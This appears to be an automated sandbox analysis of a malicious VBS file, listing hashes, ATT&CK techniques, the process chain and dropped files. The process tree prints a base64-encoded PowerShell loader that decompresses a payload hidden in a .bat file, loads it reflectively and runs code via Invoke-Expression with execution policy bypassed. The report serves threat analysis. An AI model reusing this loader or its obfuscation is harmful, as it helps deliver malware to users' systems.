28a11a70ff2b31bebb28fa2193a39ade7ce17f4478beb57f60405ea7452e988f

General

Target

28a11a70ff2b31bebb28fa2193a39ade7ce17f4478beb57f60405ea7452e988f.vbs
Size

297KB
MD5

6f56f9adf7bc5d555743d7f9af963e1a
SHA1

fcff87c7393b15e4db5db7fe9c92ea22d878aebf
SHA256

28a11a70ff2b31bebb28fa2193a39ade7ce17f4478beb57f60405ea7452e988f
SHA512

8d5381f64c1f084131c90344c41a8abe6b9d5f6680b2edfe8c0611386566c59b42ab8337c7d729ba3637bb2262af2a9521fee9ea166a3d02aa32405db3dd6113
SSDEEP

6144:S1b5FHcTMW5dXdwYLJd+ePCCvlrnCgUhfVseeDoh1yYvczYz:S1tZBWB1aeR1CfieeDohQA

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2768 powershell.exe
2524 powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2768 powershell.exe
2524 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2768 powershell.exe
Token: SeDebugPrivilege 2524 powershell.exe

pid	process
2768	powershell.exe
2524	powershell.exe

pid	process
2768	powershell.exe
2524	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2768	powershell.exe
Token: SeDebugPrivilege	2524	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

WScript.execmd.exe

description	pid	process	target process
PID 2492 wrote to memory of 2516	2492	WScript.exe	cmd.exe
PID 2492 wrote to memory of 2516	2492	WScript.exe	cmd.exe
PID 2492 wrote to memory of 2516	2492	WScript.exe	cmd.exe
PID 2516 wrote to memory of 2768	2516	cmd.exe	powershell.exe
PID 2516 wrote to memory of 2768	2516	cmd.exe	powershell.exe
PID 2516 wrote to memory of 2768	2516	cmd.exe	powershell.exe
PID 2516 wrote to memory of 2768	2516	cmd.exe	powershell.exe
PID 2516 wrote to memory of 2524	2516	cmd.exe	powershell.exe
PID 2516 wrote to memory of 2524	2516	cmd.exe	powershell.exe
PID 2516 wrote to memory of 2524	2516	cmd.exe	powershell.exe
PID 2516 wrote to memory of 2524	2516	cmd.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28a11a70ff2b31bebb28fa2193a39ade7ce17f4478beb57f60405ea7452e988f.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2492

C:\Windows\System32\cmd.exe
cmd /c ""C:\Users\Admin\koFiVp.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2516

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('IyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQpmdW5jdGlvbiBEZWNvbXByZXNzQnl0ZXMoJGNvbXByZXNzZWREYXRhKSB7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGNvbXByZXNzZWREYXRhKSkpOyAkbXMuUG9zaXRpb24gPSAwOyAkZGVmbGF0ZVN0cmVhbSA9IFtJTy5Db21wcmVzc2lvbi5EZWZsYXRlU3RyZWFtXTo6bmV3KCRtcywgW0lPLkNvbXByZXNzaW9uLkNvbXByZXNzaW9uTW9kZV06OkRlY29tcHJlc3MpOyAkYnVmZmVyID0gW2J5dGVbXV06Om5ldyg0MDk2KTsgJG1zID0gW0lPLk1lbW9yeVN0cmVhbV06Om5ldygpOyB3aGlsZSAoJHRydWUpIHsgJGNvdW50ID0gJGRlZmxhdGVTdHJlYW0uUmVhZCgkYnVmZmVyLCAwLCAkYnVmZmVyLkxlbmd0aCk7IGlmICgkY291bnQgLWVxIDApIHsgYnJlYWsgfSAkbXMuV3JpdGUoJGJ1ZmZlciwgMCwgJGNvdW50KSB9ICRkZWZsYXRlU3RyZWFtLkNsb3NlKCk7ICRtcy5Ub0FycmF5KCkgfQ0KDQojICJUaGUgc3VyZXN0IHdheSB0byBjb3JydXB0IGEgeW91dGggaXMgdG8gaW5zdHJ1Y3QgaGltIHRvIGhvbGQgaW4gaGlnaGVyIGVzdGVlbSB0aG9zZSB3aG8gdGhpbmsgYWxpa2UgdGhhbiB0aG9zZSB3aG8gdGhpbmsgZGlmZmVyZW50bHkuIg0KIyAiSW4gaGVhdmVuLCBhbGwgdGhlIGludGVyZXN0aW5nIHBlb3BsZSBhcmUgbWlzc2luZy4iDQoNCg0KDQpmdW5jdGlvbiBSZXZlcnNlU3RyaW5nKCRpbnB1dFN0cmluZykgew0KICAgICRjaGFyQXJyYXkgPSAkaW5wdXRTdHJpbmcuVG9DaGFyQXJyYXkoKQ0KICAgICRyZXZlcnNlZEFycmF5ID0gJGNoYXJBcnJheVstMS4uLSgkY2hhckFycmF5Lkxlbmd0aCldDQogICAgJHJldmVyc2VkU3RyaW5nID0gLWpvaW4gJHJldmVyc2VkQXJyYXkNCiAgICByZXR1cm4gJHJldmVyc2VkU3RyaW5nDQp9DQojICJUaGVyZSBpcyBhbHdheXMgc29tZSBtYWRuZXNzIGluIGxvdmUuIEJ1dCB0aGVyZSBpcyBhbHNvIGFsd2F5cyBzb21lIHJlYXNvbiBpbiBtYWRuZXNzLiINCiMgIlRoYXQgd2hpY2ggZG9lcyBub3Qga2lsbCB1cyBtYWtlcyB1cyBzdHJvbmdlci4iDQoNCmZ1bmN0aW9uIENsb3NlLVByb2Nlc3Mgew0KICAgIHBhcmFtKA0KICAgICAgICBbc3RyaW5nXSRQcm9jZXNzTmFtZQ0KICAgICkNCg0KICAgICRwcm9jZXNzID0gR2V0LVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1FcnJvckFjdGlvbiBTaWxlbnRseUNvbnRpbnVlDQoNCiAgICBpZiAoJHByb2Nlc3MgLW5lICRudWxsKSB7DQogICAgICAgIFN0b3AtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUZvcmNlDQoJfQ0KfQ0KIyAiSW4gaW5kaXZpZHVhbHMsIGluc2FuaXR5IGlzIHJhcmU7IGJ1dCBpbiBncm91cHMsIHBhcnRpZXMsIG5hdGlvbnMsIGFuZCBlcG9jaHMsIGl0IGlzIHRoZSBydWxlLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KDQokZW5jb2RlZEFycmF5ID0gQCgxNTksMjIwLDIzOCwyMzgsMjI0LDIzMiwyMjEsMjMxLDI0NCwxNjksMTkyLDIzMywyMzksMjM3LDI0NCwyMDMsMjM0LDIyOCwyMzMsMjM5LDE2OSwxOTYsMjMzLDI0MSwyMzQsMjMwLDIyNCwxNjMsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjcsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjQsMTgyKQ0KJGRlY29kZWRTdHJpbmcgPSBDTlYgJGVuY29kZWRBcnJheQ0KDQoNCiRmaWxlUGF0aCA9IEpvaW4tUGF0aCAkZW52OlVzZXJQcm9maWxlICJrb0ZpVnAuYmF0Ig0KJGxhc3RMaW5lID0gR2V0LUNvbnRlbnQgLVBhdGggJGZpbGVQYXRoIHwgU2VsZWN0LU9iamVjdCAtTGFzdCAxDQokY2xlYW5lZExpbmUgPSAkbGFzdExpbmUgLXJlcGxhY2UgJ146OicNCiRyZXZlcnNlID0gUmV2ZXJzZVN0cmluZyAkY2xlYW5lZExpbmUNCiRkZWNvbXByZXNzZWRCeXRlID0gRGVjb21wcmVzc0J5dGVzIC1jb21wcmVzc2VkRGF0YSAkcmV2ZXJzZQ0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQokYXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGRlY29tcHJlc3NlZEJ5dGUpDQoNCg0KQ2xvc2UtUHJvY2VzcyAtUHJvY2Vzc05hbWUgImNtZCINCkludm9rZS1FeHByZXNzaW9uICRkZWNvZGVkU3RyaW5n')) | Out-File -FilePath 'C:\Users\Admin\koFiVp.ps1' -Encoding UTF8"
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\koFiVp.ps1"
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2524

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
c8914912fc7ae572dc35c6f86902f67b

SHA1
aa7cb09f849342c881628d4ca09efbade896758d

SHA256
9970e195e40117c3784512e7de70231f0b47f80536c7e75842ffc3e0e5ff3118

SHA512
5077e1583be8d35b9e31d5dd9587edda03ed124e8ed403465a5cc09291d68cd7dc2182f95559e7b2f6eb202451dbca14121ac545aa0c4efcf5fcfd88cc9022eb

Download Submit
C:\Users\Admin\koFiVp.bat
Filesize
277KB

MD5
0b559157fc24f3d30eb86f521b90ca05

SHA1
b14552d2a9e30c65c4b2ab3975f2c28a70e7482c

SHA256
848a86578531474c2ab7a0a24e893e4622e794e2f56041902f9d7a0f5b442e57

SHA512
8e782ef7bd83a5693ca04b2905d71a2d9b30170cf47c92d10730d09e5127b0fe0c8128e0b3ccbbb1f55bbfb1fe3118d939e21748762f49f41587f6c2b4870d20

Download Submit
C:\Users\Admin\koFiVp.ps1
Filesize
2KB

MD5
81a0dc1efcbb4347d8204ba454c530bd

SHA1
d11b2417f0f008c036873c7a610adc2088c80f1d

SHA256
9920dbc679fdd1c800a11a40d2b22ca65f1a4a96e4e173505c1c27f09c80e760

SHA512
9116d86b1bf980da6f68e4ad07e8805030d0941d298dd58c80b16f5c9b8ffd48c9c72c75b8588180b85adc9766401531dc43cdc32da345712913c73d8563f0e0

Download Submit
memory/2768-12-0x0000000074090000-0x000000007463B000-memory.dmp

Filesize
5.7MB

Download
memory/2768-15-0x00000000024F0000-0x0000000002530000-memory.dmp

Filesize
256KB

Download
memory/2768-14-0x00000000024F0000-0x0000000002530000-memory.dmp

Filesize
256KB

Download
memory/2768-16-0x00000000024F0000-0x0000000002530000-memory.dmp

Filesize
256KB

Download
memory/2768-13-0x0000000074090000-0x000000007463B000-memory.dmp

Filesize
5.7MB

Download
memory/2768-18-0x0000000074090000-0x000000007463B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing